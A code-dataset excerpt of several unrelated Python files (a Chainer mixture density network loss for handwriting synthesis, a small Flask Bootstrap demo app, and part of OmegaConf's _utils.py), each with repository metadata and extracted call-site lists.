'relativedelta', ({}, {}), '(**kwargs)', False, 'from dateutil.relativedelta import relativedelta\n'), ((58, 50, 58, 71), 'dateutil.relativedelta.relativedelta', 'relativedelta', (), '', False, 'from dateutil.relativedelta import relativedelta\n'), ((117, 19, 117, 67), 'dateparser.utils.apply_timezone_from_settings', 'apply_timezone_from_settings', ({(117, 48, 117, 56): 'date_obj', (117, 58, 117, 66): 'settings'}, {}), '(date_obj, settings)', False, 'from dateparser.utils import normalize_unicode, apply_timezone_from_settings\n'), ((122, 11, 122, 43), 'calendar.monthrange', 'calendar.monthrange', ({(122, 31, 122, 35): 'year', (122, 37, 122, 42): 'month'}, {}), '(year, month)', False, 'import calendar\n'), ((387, 21, 387, 83), 'collections.namedtuple', 'collections.namedtuple', ({(387, 44, 387, 54): '"""DateData"""', (387, 56, 387, 82): '"""date_obj period language"""'}, {}), "('DateData', 'date_obj period language')", False, 'import collections\n'), ((134, 23, 134, 66), 'datetime.datetime.strptime', 'datetime.strptime', ({(134, 41, 134, 52): 'date_string', (134, 54, 134, 65): 'date_format'}, {}), '(date_string, date_format)', False, 'from datetime import datetime, timedelta\n'), ((149, 23, 149, 71), 'dateparser.utils.apply_timezone_from_settings', 'apply_timezone_from_settings', ({(149, 52, 149, 60): 'date_obj', (149, 62, 149, 70): 'settings'}, {}), '(date_obj, settings)', False, 'from dateparser.utils import normalize_unicode, apply_timezone_from_settings\n'), ((162, 12, 162, 64), 'warnings.warn', 'warn', ({(162, 17, 162, 48): 'self.DATE_FORMATS_ERROR_MESSAGE', (162, 50, 162, 63): 'FutureWarning'}, {}), '(self.DATE_FORMATS_ERROR_MESSAGE, FutureWarning)', False, 'from warnings import warn\n'), ((372, 26, 372, 56), 'dateparser.utils.normalize_unicode', 'normalize_unicode', ({(372, 44, 372, 55): 'date_string'}, {}), '(date_string)', False, 'from dateparser.utils import normalize_unicode, apply_timezone_from_settings\n'), ((394, 34, 394, 54), 'dateparser.languages.loader.LanguageDataLoader', 'LanguageDataLoader', ({}, {}), '()', False, 'from dateparser.languages.loader import LanguageDataLoader\n'), ((146, 24, 146, 40), 'datetime.datetime.today', 'datetime.today', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((316, 37, 316, 72), 
'dateparser.languages.detection.ExactLanguages', 'ExactLanguages', (), '', False, 'from dateparser.languages.detection import AutoDetectLanguage, ExactLanguages\n')] |
kristofbc/handwriting-synthesis | src/models/functions/connection/mixture_density_network.py | 16505e89fd7275d4cd3ed9c4388c9f3c153a0397 | import chainer
import chainer.functions
from chainer.utils import type_check
from chainer import cuda
from chainer import function
import numpy as np
#from chainer import function_node
from utils import clip_grad
#class MixtureDensityNetworkFunction(function_node.FunctionNode):
class MixtureDensityNetworkFunction(function.Function):
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 8)
x_type, eos_input_type, pi_input_type, mu_x1_input_type, mu_x2_input_type, s_x1_input_type, s_x2_input_type, rho_input_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
eos_input_type.dtype.kind == 'f',
pi_input_type.dtype.kind == 'f',
mu_x1_input_type.dtype.kind == 'f',
mu_x2_input_type.dtype.kind == 'f',
s_x1_input_type.dtype.kind == 'f',
s_x2_input_type.dtype.kind == 'f',
rho_input_type.dtype.kind == 'f',
x_type.ndim >= 2,
eos_input_type.ndim >= 2,
x_type.shape[0] == eos_input_type.shape[0],
x_type.shape[0] == pi_input_type.shape[0],
x_type.shape[0] == mu_x1_input_type.shape[0],
x_type.shape[0] == mu_x2_input_type.shape[0],
x_type.shape[0] == s_x1_input_type.shape[0],
x_type.shape[0] == s_x2_input_type.shape[0],
x_type.shape[0] == rho_input_type.shape[0],
pi_input_type.shape[1] == mu_x1_input_type.shape[1],
mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1],
mu_x2_input_type.shape[1] == s_x1_input_type.shape[1],
s_x1_input_type.shape[1] == s_x2_input_type.shape[1],
s_x2_input_type.shape[1] == rho_input_type.shape[1]
)
pass
def forward(self, inputs):
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
#self.retain_inputs(range(len(inputs))) # Retain everything for backward
if not type_check.same_types(*inputs):
raise ValueError("numpy and cupy must not be used together\n"
"type(x): {0}, type(eos_input): {1}, type(pi_input): {2}"
"type(mu_x1_input): {3}, type(mu_x2_input): {4}, type(s_x1_input): {5}"
"type(s_x2_input): {6}, type(rho_input): {7}"
.format(type(x), type(eos_input), type(pi_input),
type(mu_x1_input), type(mu_x2_input), type(s_x1_input),
type(s_x2_input), type(rho_input)))
xp = cuda.get_array_module(*inputs)
def softmax(x):
shiftx = x - x.max()
exps = xp.exp(shiftx)
return exps / xp.sum(exps, 1, keepdims=True)
# Get MDN coeff. Eq #18 to #22
z_eos = 1. / (1. + xp.exp(eos_input)) # F.sigmoid. NOTE: usually sigmoid is 1/(1+e^-x). Here 'x' is >0!
z_s_x1 = xp.exp(s_x1_input) + 1e-10
z_s_x2 = xp.exp(s_x2_input) + 1e-10
z_rho = xp.tanh(rho_input)
z_pi = softmax(pi_input)
#z_pi = xp.exp(pi_input)
#z_pi = z_pi / xp.sum(z_pi, 1, keepdims=True)
z_mu_x1 = mu_x1_input
z_mu_x2 = mu_x2_input
# The MDN coeff are saved, because they're reused in the backward phase
self.z_eos = z_eos
self.z_s_x1 = z_s_x1
self.z_s_x2 = z_s_x2
self.z_rho = z_rho
self.z_pi = z_pi
self.z_mu_x1 = z_mu_x1
self.z_mu_x2 = z_mu_x2
# Compute the loss.
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
# Z variable. Eq. 25
norm_x1 = x1 - z_mu_x1
norm_x2 = x2 - z_mu_x2
z_left = (xp.square(norm_x1)/xp.square(z_s_x1)) + (xp.square(norm_x2)/xp.square(z_s_x2))
z_right = (2.*z_rho*norm_x1*norm_x2)/(z_s_x1*z_s_x2)
z = z_left - z_right
self.z = z
# Normal function. Eq. 24.
inv_ro = 1. - xp.square(z_rho) + 1e-10
n_left = 2. * np.pi * z_s_x1 * z_s_x2 * xp.sqrt(inv_ro) + 1e-10 # + 1e-10 for computational stability
n_right = xp.exp(-z / (2. * inv_ro))
n = n_right / n_left
# Gamma parameter (for the backward phase). Eq. 28-29
gamma = z_pi * n
gamma = gamma / (xp.sum(gamma, 1, keepdims=True) + 1e-10) # sum + 1e-10 for computational stability, != nan!
self.gamma = gamma
# Sequence loss. Eq. 26
loss_y = z_pi * n
loss_y = xp.sum(loss_y, 1, keepdims=True) + 1e-10 # + 1e-10 for computational stability, != nan
#epsilon = xp.full(loss_y.shape, 1e-10, dtype=xp.float32)
#loss_y = xp.maximum(loss_y, epsilon) # Because at the begining loss_y is exactly 0 sometime
loss_y = -xp.log(loss_y + 1e-10)
#loss_x = z_eos * x3 + (1. - z_eos) * (1. - x3)
#loss_x = -xp.log(loss_x)
loss_x = -x3 * xp.log(z_eos + 1e-10) - (1. - x3) * xp.log(1. - z_eos + 1e-10)
loss = loss_y + loss_x
# Mask guard to check if x3 == 2 (added padding)
idx_mask = xp.where(x3==2)[0]
mask = xp.ones_like(x3)
mask[idx_mask, 0] = 0.
self.mask = mask
loss *= mask
return loss, x, z_eos, z_pi, z_mu_x1, z_mu_x2, z_s_x1, z_s_x2, z_rho,
def backward(self, inputs, grad_outputs):
xp = cuda.get_array_module(*inputs)
#x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = self.get_retained_inputs()
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
# MDN coeff to differentiate
g_eos = xp.empty_like(eos_input)
g_s_x1 = xp.empty_like(s_x1_input)
g_s_x2 = xp.empty_like(s_x2_input)
g_rho = xp.empty_like(rho_input)
g_pi = xp.empty_like(pi_input)
g_mu_x1 = xp.empty_like(mu_x1_input)
g_mu_x2 = xp.empty_like(mu_x2_input)
# Compute the gradient
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
#if xp == np:
# From eq. 27 to 37
C = 1. / (1. - self.z_rho*self.z_rho + 1e-10)
d_norm_x1 = (x1 - self.z_mu_x1) / self.z_s_x1
d_norm_x2 = (x2 - self.z_mu_x2) / self.z_s_x2
d_rho_norm_x1 = self.z_rho * d_norm_x1
d_rho_norm_x2 = self.z_rho * d_norm_x2
g_eos = (x3 - self.z_eos) * self.mask
g_pi = (self.z_pi - self.gamma) * self.mask
g_mu_x1 = - self.gamma * ((C/self.z_s_x1) * (d_norm_x1 - d_rho_norm_x2)) * self.mask
g_mu_x2 = - self.gamma * ((C/self.z_s_x2) * (d_norm_x2 - d_rho_norm_x1)) * self.mask
g_s_x1 = - self.gamma * ((C*d_norm_x1) * (d_norm_x1 - d_rho_norm_x2) - 1.) * self.mask
g_s_x2 = - self.gamma * ((C*d_norm_x2) * (d_norm_x2 - d_rho_norm_x1) - 1.) * self.mask
g_rho = - self.gamma * (d_norm_x1*d_norm_x2 + self.z_rho*(1. - C * self.z)) * self.mask
#else:
# g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho = cuda.elementwise(
# 'T x1, T x2, T eos_input, T pi_input, T mu_x1_input, T mu_x2_input, T s_x1_input, T s_x2_input, T rho_input',
# 'T g_eos, T g_pi, T g_mu_x1, T g_mu_x2, T g_s_x1, T g_s_x2, T g_rho',
# )
# Add grad_clipping here if it explodes P.23
th_min = -100.0
th_max = 100.0
g_eos = clip_grad(g_eos, th_min, th_max, xp)
g_pi = clip_grad(g_pi, th_min, th_max, xp)
g_mu_x1 = clip_grad(g_mu_x1, th_min, th_max, xp)
g_mu_x2 = clip_grad(g_mu_x2, th_min, th_max, xp)
g_s_x1 = clip_grad(g_s_x1, th_min, th_max, xp)
g_s_x2 = clip_grad(g_s_x2, th_min, th_max, xp)
g_rho = clip_grad(g_rho, th_min, th_max, xp)
return None, g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho,
def mixture_density_network(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho):
""" Mixture Density Network
Output the coefficient params
Args:
x (Variable): Tensor containing the position [x1, x2, x3] to predict
eos (Variable): End-of-stroke prediction
pi (Variable): mixture components
mu_x1 (Variable): mean of x1
mu_x2 (Variable): mean of x2
s_x1 (Variable): variance of x1
s_x2 (Variable): variance of x2
rho (Variable): correlation parameter
Returns:
loss (Variable)
y (Variable)
eos (Variable)
pi (Variable)
mu_x1 (Variable)
mu_x2 (Variable)
s_x1 (Variable)
s_x2 (Variable)
rho (Variable)
"""
return MixtureDensityNetworkFunction()(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho)
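# Hedged reference sketch (editor addition, not part of the upstream module): a pure-NumPy
# restatement of the bivariate Gaussian density (Eq. 24-25 in Graves, 2013) that the
# forward pass above implements, handy for sanity-checking a single mixture component.
def _bivariate_gaussian_density(x1, x2, mu1, mu2, s1, s2, rho):
    norm1 = (x1 - mu1) / s1
    norm2 = (x2 - mu2) / s2
    z = norm1 ** 2 + norm2 ** 2 - 2.0 * rho * norm1 * norm2
    inv_rho = 1.0 - rho ** 2
    return np.exp(-z / (2.0 * inv_rho)) / (2.0 * np.pi * s1 * s2 * np.sqrt(inv_rho))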
| [((19, 8, 45, 9), 'chainer.utils.type_check.expect', 'type_check.expect', ({(20, 12, 20, 36): "(x_type.dtype.kind == 'f')", (21, 12, 21, 44): "(eos_input_type.dtype.kind == 'f')", (22, 12, 22, 43): "(pi_input_type.dtype.kind == 'f')", (23, 12, 23, 46): "(mu_x1_input_type.dtype.kind == 'f')", (24, 12, 24, 46): "(mu_x2_input_type.dtype.kind == 'f')", (25, 12, 25, 45): "(s_x1_input_type.dtype.kind == 'f')", (26, 12, 26, 45): "(s_x2_input_type.dtype.kind == 'f')", (27, 12, 27, 44): "(rho_input_type.dtype.kind == 'f')", (29, 12, 29, 28): '(x_type.ndim >= 2)', (30, 12, 30, 36): '(eos_input_type.ndim >= 2)', (32, 12, 32, 54): '(x_type.shape[0] == eos_input_type.shape[0])', (33, 12, 33, 53): '(x_type.shape[0] == pi_input_type.shape[0])', (34, 12, 34, 56): '(x_type.shape[0] == mu_x1_input_type.shape[0])', (35, 12, 35, 56): '(x_type.shape[0] == mu_x2_input_type.shape[0])', (36, 12, 36, 55): '(x_type.shape[0] == s_x1_input_type.shape[0])', (37, 12, 37, 55): '(x_type.shape[0] == s_x2_input_type.shape[0])', (38, 12, 38, 54): '(x_type.shape[0] == rho_input_type.shape[0])', (40, 12, 40, 63): '(pi_input_type.shape[1] == mu_x1_input_type.shape[1])', (41, 12, 41, 66): '(mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1])', (42, 12, 42, 65): '(mu_x2_input_type.shape[1] == s_x1_input_type.shape[1])', (43, 12, 43, 64): '(s_x1_input_type.shape[1] == s_x2_input_type.shape[1])', (44, 12, 44, 63): '(s_x2_input_type.shape[1] == rho_input_type.shape[1])'}, {}), "(x_type.dtype.kind == 'f', eos_input_type.dtype.kind ==\n 'f', pi_input_type.dtype.kind == 'f', mu_x1_input_type.dtype.kind ==\n 'f', mu_x2_input_type.dtype.kind == 'f', s_x1_input_type.dtype.kind ==\n 'f', s_x2_input_type.dtype.kind == 'f', rho_input_type.dtype.kind ==\n 'f', x_type.ndim >= 2, eos_input_type.ndim >= 2, x_type.shape[0] ==\n eos_input_type.shape[0], x_type.shape[0] == pi_input_type.shape[0], \n x_type.shape[0] == mu_x1_input_type.shape[0], x_type.shape[0] ==\n mu_x2_input_type.shape[0], x_type.shape[0] == s_x1_input_type.shape[0],\n x_type.shape[0] == s_x2_input_type.shape[0], x_type.shape[0] ==\n rho_input_type.shape[0], pi_input_type.shape[1] == mu_x1_input_type.\n shape[1], mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1], \n mu_x2_input_type.shape[1] == s_x1_input_type.shape[1], s_x1_input_type.\n shape[1] == s_x2_input_type.shape[1], s_x2_input_type.shape[1] ==\n rho_input_type.shape[1])", False, 'from chainer.utils import type_check\n'), ((62, 13, 62, 43), 'chainer.cuda.get_array_module', 'cuda.get_array_module', ({(62, 35, 62, 42): '*inputs'}, {}), '(*inputs)', False, 'from chainer import cuda\n'), ((136, 13, 136, 43), 'chainer.cuda.get_array_module', 'cuda.get_array_module', ({(136, 35, 136, 42): '*inputs'}, {}), '(*inputs)', False, 'from chainer import cuda\n'), ((181, 16, 181, 52), 'utils.clip_grad', 'clip_grad', ({(181, 26, 181, 31): 'g_eos', (181, 33, 181, 39): 'th_min', (181, 41, 181, 47): 'th_max', (181, 49, 181, 51): 'xp'}, {}), '(g_eos, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((182, 15, 182, 50), 'utils.clip_grad', 'clip_grad', ({(182, 25, 182, 29): 'g_pi', (182, 31, 182, 37): 'th_min', (182, 39, 182, 45): 'th_max', (182, 47, 182, 49): 'xp'}, {}), '(g_pi, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((183, 18, 183, 56), 'utils.clip_grad', 'clip_grad', ({(183, 28, 183, 35): 'g_mu_x1', (183, 37, 183, 43): 'th_min', (183, 45, 183, 51): 'th_max', (183, 53, 183, 55): 'xp'}, {}), '(g_mu_x1, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((184, 18, 184, 56), 
'utils.clip_grad', 'clip_grad', ({(184, 28, 184, 35): 'g_mu_x2', (184, 37, 184, 43): 'th_min', (184, 45, 184, 51): 'th_max', (184, 53, 184, 55): 'xp'}, {}), '(g_mu_x2, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((185, 17, 185, 54), 'utils.clip_grad', 'clip_grad', ({(185, 27, 185, 33): 'g_s_x1', (185, 35, 185, 41): 'th_min', (185, 43, 185, 49): 'th_max', (185, 51, 185, 53): 'xp'}, {}), '(g_s_x1, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((186, 17, 186, 54), 'utils.clip_grad', 'clip_grad', ({(186, 27, 186, 33): 'g_s_x2', (186, 35, 186, 41): 'th_min', (186, 43, 186, 49): 'th_max', (186, 51, 186, 53): 'xp'}, {}), '(g_s_x2, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((187, 16, 187, 52), 'utils.clip_grad', 'clip_grad', ({(187, 26, 187, 31): 'g_rho', (187, 33, 187, 39): 'th_min', (187, 41, 187, 47): 'th_max', (187, 49, 187, 51): 'xp'}, {}), '(g_rho, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((53, 15, 53, 45), 'chainer.utils.type_check.same_types', 'type_check.same_types', ({(53, 37, 53, 44): '*inputs'}, {}), '(*inputs)', False, 'from chainer.utils import type_check\n')] |
DazEB2/SimplePyScripts | flask__webservers/bootstrap_4__toggle_switch__examples/main.py | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: https://github.com/twbs/bootstrap
# SOURCE: https://github.com/gitbrent/bootstrap4-toggle
# SOURCE: https://gitbrent.github.io/bootstrap4-toggle/
from flask import Flask, render_template
app = Flask(__name__)
import logging
logging.basicConfig(level=logging.DEBUG)
@app.route("/")
def index():
return render_template('index.html')
if __name__ == '__main__':
app.debug = True
# Localhost
# port=0 -- random free port
# app.run(port=0)
app.run(
port=5000,
# :param threaded: should the process handle each request in a separate
# thread?
# :param processes: if greater than 1 then handle each request in a new process
# up to this maximum number of concurrent processes.
threaded=True,
)
# # Public IP
# app.run(host='0.0.0.0')
| [((13, 6, 13, 21), 'flask.Flask', 'Flask', ({(13, 12, 13, 20): '__name__'}, {}), '(__name__)', False, 'from flask import Flask, render_template\n'), ((16, 0, 16, 40), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((21, 11, 21, 40), 'flask.render_template', 'render_template', ({(21, 27, 21, 39): '"""index.html"""'}, {}), "('index.html')", False, 'from flask import Flask, render_template\n')] |
eragasa/pypospack | dev/phonts/visualization/phonts.py | 21cdecaf3b05c87acc532d992be2c04d85bfbc22 | import pypospack.io.phonts as phonts
# <---- additional classes and functions to add on top of
# <---- pypospack.io.phonts
if __name__ == "__main__":
    pass
| [] |
sugatoray/omegaconf | omegaconf/_utils.py | edf9e86493a14b0e909e956d9bae59b9861ef9c5 | import copy
import os
import re
import string
import sys
import warnings
from contextlib import contextmanager
from enum import Enum
from textwrap import dedent
from typing import (
Any,
Dict,
Iterator,
List,
Optional,
Tuple,
Type,
Union,
get_type_hints,
)
import yaml
from .errors import (
ConfigIndexError,
ConfigTypeError,
ConfigValueError,
GrammarParseError,
OmegaConfBaseException,
ValidationError,
)
from .grammar_parser import SIMPLE_INTERPOLATION_PATTERN, parse
try:
import dataclasses
except ImportError: # pragma: no cover
dataclasses = None # type: ignore # pragma: no cover
try:
import attr
except ImportError: # pragma: no cover
attr = None # type: ignore # pragma: no cover
# Regexprs to match key paths like: a.b, a[b], ..a[c].d, etc.
# We begin by matching the head (in these examples: a, a, ..a).
# This can be read as "dots followed by any character but `.` or `[`"
# Note that a key starting with brackets, like [a], is purposely *not*
# matched here and will instead be handled in the next regex below (this
# is to keep this regex simple).
KEY_PATH_HEAD = re.compile(r"(\.)*[^.[]*")
# Then we match other keys. The following expression matches one key and can
# be read as a choice between two syntaxes:
# - `.` followed by anything except `.` or `[` (ex: .b, .d)
# - `[` followed by anything then `]` (ex: [b], [c])
KEY_PATH_OTHER = re.compile(r"\.([^.[]*)|\[(.*?)\]")
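# Illustrative sketch (example key assumed, not part of the original module): for a key
# such as "..a[c].d", KEY_PATH_HEAD matches the head "..a", and KEY_PATH_OTHER.findall
# applied to the remaining "[c].d" yields [('', 'c'), ('d', '')] -- one tuple per key,
# with the non-empty group telling whether the dot or the bracket syntax was used.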
# source: https://yaml.org/type/bool.html
YAML_BOOL_TYPES = [
"y",
"Y",
"yes",
"Yes",
"YES",
"n",
"N",
"no",
"No",
"NO",
"true",
"True",
"TRUE",
"false",
"False",
"FALSE",
"on",
"On",
"ON",
"off",
"Off",
"OFF",
]
class Marker:
def __init__(self, desc: str):
self.desc = desc
def __repr__(self) -> str:
return self.desc
# To be used as default value when `None` is not an option.
_DEFAULT_MARKER_: Any = Marker("_DEFAULT_MARKER_")
class OmegaConfDumper(yaml.Dumper): # type: ignore
str_representer_added = False
@staticmethod
def str_representer(dumper: yaml.Dumper, data: str) -> yaml.ScalarNode:
with_quotes = yaml_is_bool(data) or is_int(data) or is_float(data)
return dumper.represent_scalar(
yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG,
data,
style=("'" if with_quotes else None),
)
def get_omega_conf_dumper() -> Type[OmegaConfDumper]:
if not OmegaConfDumper.str_representer_added:
OmegaConfDumper.add_representer(str, OmegaConfDumper.str_representer)
OmegaConfDumper.str_representer_added = True
return OmegaConfDumper
def yaml_is_bool(b: str) -> bool:
return b in YAML_BOOL_TYPES
def get_yaml_loader() -> Any:
class OmegaConfLoader(yaml.SafeLoader): # type: ignore
def construct_mapping(self, node: yaml.Node, deep: bool = False) -> Any:
keys = set()
for key_node, value_node in node.value:
if key_node.tag != yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG:
continue
if key_node.value in keys:
raise yaml.constructor.ConstructorError(
"while constructing a mapping",
node.start_mark,
f"found duplicate key {key_node.value}",
key_node.start_mark,
)
keys.add(key_node.value)
return super().construct_mapping(node, deep=deep)
loader = OmegaConfLoader
loader.add_implicit_resolver(
"tag:yaml.org,2002:float",
re.compile(
"""^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$""",
re.X,
),
list("-+0123456789."),
)
loader.yaml_implicit_resolvers = {
key: [
(tag, regexp)
for tag, regexp in resolvers
if tag != "tag:yaml.org,2002:timestamp"
]
for key, resolvers in loader.yaml_implicit_resolvers.items()
}
return loader
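# Rough behavioural sketch (example documents assumed, not part of the original file):
# yaml.load("a: 1\na: 2", Loader=get_yaml_loader()) raises a ConstructorError because
# of the duplicate key, while "a: 1\nb: 2" loads to {'a': 1, 'b': 2} as usual.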
def _get_class(path: str) -> type:
from importlib import import_module
module_path, _, class_name = path.rpartition(".")
mod = import_module(module_path)
try:
klass: type = getattr(mod, class_name)
except AttributeError:
raise ImportError(f"Class {class_name} is not in module {module_path}")
return klass
def _is_union(type_: Any) -> bool:
return getattr(type_, "__origin__", None) is Union
def _resolve_optional(type_: Any) -> Tuple[bool, Any]:
"""Check whether `type_` is equivalent to `typing.Optional[T]` for some T."""
if getattr(type_, "__origin__", None) is Union:
args = type_.__args__
if len(args) == 2 and args[1] == type(None): # noqa E721
return True, args[0]
if type_ is Any:
return True, Any
return False, type_
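# Hedged usage sketch (example annotations assumed):
# _resolve_optional(Optional[int]) -> (True, int)
# _resolve_optional(int)           -> (False, int)
# _resolve_optional(Any)           -> (True, Any)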
def _is_optional(obj: Any, key: Optional[Union[int, str]] = None) -> bool:
"""Check `obj` metadata to see if the given node is optional."""
from .base import Container, Node
if key is not None:
assert isinstance(obj, Container)
obj = obj._get_node(key)
if isinstance(obj, Node):
return obj._is_optional()
else:
# In case `obj` is not a Node, treat it as optional by default.
# This is used in `ListConfig.append` and `ListConfig.insert`
# where the appended/inserted value might or might not be a Node.
return True
def _resolve_forward(type_: Type[Any], module: str) -> Type[Any]:
import typing # lgtm [py/import-and-import-from]
forward = typing.ForwardRef if hasattr(typing, "ForwardRef") else typing._ForwardRef # type: ignore
if type(type_) is forward:
return _get_class(f"{module}.{type_.__forward_arg__}")
else:
if is_dict_annotation(type_):
kt, vt = get_dict_key_value_types(type_)
if kt is not None:
kt = _resolve_forward(kt, module=module)
if vt is not None:
vt = _resolve_forward(vt, module=module)
return Dict[kt, vt] # type: ignore
if is_list_annotation(type_):
et = get_list_element_type(type_)
if et is not None:
et = _resolve_forward(et, module=module)
return List[et] # type: ignore
return type_
def extract_dict_subclass_data(obj: Any, parent: Any) -> Optional[Dict[str, Any]]:
"""Check if obj is an instance of a subclass of Dict. If so, extract the Dict keys/values."""
from omegaconf.omegaconf import _maybe_wrap
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
subclasses_dict = is_dict_subclass(obj_type)
if subclasses_dict:
warnings.warn(
f"Class `{obj_type.__name__}` subclasses `Dict`."
+ " Subclassing `Dict` in Structured Config classes is deprecated,"
+ " see github.com/omry/omegaconf/issues/663",
UserWarning,
stacklevel=9,
)
if is_type:
return None
elif subclasses_dict:
dict_subclass_data = {}
key_type, element_type = get_dict_key_value_types(obj_type)
for name, value in obj.items():
is_optional, type_ = _resolve_optional(element_type)
type_ = _resolve_forward(type_, obj.__module__)
try:
dict_subclass_data[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=parent,
)
except ValidationError as ex:
format_and_raise(
node=None, key=name, value=value, cause=ex, msg=str(ex)
)
return dict_subclass_data
else:
return None
def get_attr_class_field_names(obj: Any) -> List[str]:
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
return list(attr.fields_dict(obj_type))
def get_attr_data(obj: Any, allow_objects: Optional[bool] = None) -> Dict[str, Any]:
from omegaconf.omegaconf import OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
from omegaconf import MISSING
d = {}
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
for name, attrib in attr.fields_dict(obj_type).items():
is_optional, type_ = _resolve_optional(attrib.type)
type_ = _resolve_forward(type_, obj.__module__)
if not is_type:
value = getattr(obj, name)
else:
value = attrib.default
if value == attr.NOTHING:
value = MISSING
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def get_dataclass_field_names(obj: Any) -> List[str]:
return [field.name for field in dataclasses.fields(obj)]
def get_dataclass_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
d = {}
obj_type = get_type_of(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
resolved_hints = get_type_hints(obj_type)
for field in dataclasses.fields(obj):
name = field.name
is_optional, type_ = _resolve_optional(resolved_hints[field.name])
type_ = _resolve_forward(type_, obj.__module__)
if hasattr(obj, name):
value = getattr(obj, name)
if value == dataclasses.MISSING:
value = MISSING
else:
if field.default_factory == dataclasses.MISSING: # type: ignore
value = MISSING
else:
value = field.default_factory() # type: ignore
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def is_dataclass(obj: Any) -> bool:
from omegaconf.base import Node
if dataclasses is None or isinstance(obj, Node):
return False
return dataclasses.is_dataclass(obj)
def is_attr_class(obj: Any) -> bool:
from omegaconf.base import Node
if attr is None or isinstance(obj, Node):
return False
return attr.has(obj)
def is_structured_config(obj: Any) -> bool:
return is_attr_class(obj) or is_dataclass(obj)
def is_dataclass_frozen(type_: Any) -> bool:
return type_.__dataclass_params__.frozen # type: ignore
def is_attr_frozen(type_: type) -> bool:
# This is very hacky and probably fragile as well.
# Unfortunately currently there isn't an official API in attr that can detect that.
# noinspection PyProtectedMember
return type_.__setattr__ == attr._make._frozen_setattrs # type: ignore
def get_type_of(class_or_object: Any) -> Type[Any]:
type_ = class_or_object
if not isinstance(type_, type):
type_ = type(class_or_object)
assert isinstance(type_, type)
return type_
def is_structured_config_frozen(obj: Any) -> bool:
type_ = get_type_of(obj)
if is_dataclass(type_):
return is_dataclass_frozen(type_)
if is_attr_class(type_):
return is_attr_frozen(type_)
return False
def get_structured_config_field_names(obj: Any) -> List[str]:
if is_dataclass(obj):
return get_dataclass_field_names(obj)
elif is_attr_class(obj):
return get_attr_class_field_names(obj)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
def get_structured_config_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
if is_dataclass(obj):
return get_dataclass_data(obj, allow_objects=allow_objects)
elif is_attr_class(obj):
return get_attr_data(obj, allow_objects=allow_objects)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
class ValueKind(Enum):
VALUE = 0
MANDATORY_MISSING = 1
INTERPOLATION = 2
def _is_missing_value(value: Any) -> bool:
from omegaconf import Node
if isinstance(value, Node):
value = value._value()
return _is_missing_literal(value)
